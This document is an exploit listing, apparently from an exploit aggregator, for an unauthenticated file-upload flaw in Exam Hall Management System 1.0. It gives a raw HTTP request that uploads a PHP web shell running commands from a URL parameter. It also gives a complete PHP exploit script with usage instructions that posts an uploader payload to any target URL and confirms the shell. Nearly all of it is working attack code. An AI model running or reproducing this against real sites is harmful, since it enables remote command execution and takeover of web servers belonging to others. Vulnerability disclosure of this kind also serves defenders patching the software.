Exploit for Exam Hall Management System 1.0 Shell Upload

Name: Exploit for Exam Hall Management System 1.0 Shell Upload
Rating: 5 (270 reviews)
2021-07-06 | CVSS -0.6
## https://sploitus.com/exploit?id=PACKETSTORM:163407
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)  
# Date: 06/07/2021  
# Exploit Author: Thamer Almohammadi (@Thamerz88)  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html  
# Version: 1.0  
# Tested on: Kali Linux  
  
# Proof of Concept :  
  
1- Send Request to /pages/save_user.php.  
2- Find your shell.php file path and try any command.  
  
  
################################## REQUEST ###############################  
POST /pages/save_user.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877  
Content-Length: 369  
-----------------------------3767690350396265302394702877  
Content-Disposition: form-data; name="image"; filename="shell.php"  
Content-Type: application/x-php  
<?php  
  
system($_GET['cmd']);  
  
?>  
-----------------------------3767690350396265302394702877  
  
Content-Disposition: form-data; name="btn_save"  
  
-----------------------------3767690350396265302394702877--  
  
  
  
  
################################## RESPONSE #############################  
HTTP/1.1 200 OK  
Date: Tue, 06 Jul 2021 02:16:18 GMT  
Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/7.3.28  
Content-Length: 1529  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
  
################################## Exploit #############################  
<?php  
// Coder By Thamer Almohammadi(@Thamerz88);  
function exploit($scheme,$host,$path,$shell){  
$url=$scheme."://".$host.$path;  
$content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';  
$data = "-----------------------------3767690350396265302394702877\r\n";  
$data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n";  
$data .= "Content-Type: image/gif\r\n\r\n";  
$data .= "$content\r\n";  
$data .= "-----------------------------3767690350396265302394702877\r\n";  
  
$data .= "-----------------------------3767690350396265302394702877\r\n";  
$data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n";  
$data .= "\r\n";  
$data .= "-----------------------------3767690350396265302394702877\r\n";  
  
$packet = "POST $path/pages/save_user.php HTTP/1.0\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";  
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";  
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";  
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";  
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n";  
$packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";  
$packet .= $data;  
$packet .= "\r\n";  
send($host, $packet);  
sleep(2);  
check($url,$shell);  
}  
function send($host, $packet)  
{  
if ($connect = @fsockopen ($host, 80, $x, $y, 3))  
{  
@fputs ($connect, $packet);  
@fclose ($connect);  
}  
  
}  
  
function check($url,$shell){  
$check=file_get_contents($url."/uploadImage/Profile/".$shell);  
$preg=preg_match('/(File To Upload)/', $check, $output);  
if($output[0] == "File To Upload"){  
echo "[+] Upload shell successfully.. :D\n";   
echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n";   
}  
else{ //Exploit Failed  
echo "[-] Exploit Failed..\n";   
}  
  
  
}  
$options=getopt("u:s:");  
if(!isset($options['u'], $options['s']))   
die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n   
-u http://target.com = Target URL ..  
-s shell.php = Shell Name ..\n\n");   
$url=$options["u"];  
$shell=$options["s"];  
$parse=parse_url($url);  
$host=$parse['host'];  
$path=$parse['path'];  
$scheme=$parse['scheme'];  
exploit($scheme,$host,$path,$shell);  
  
?>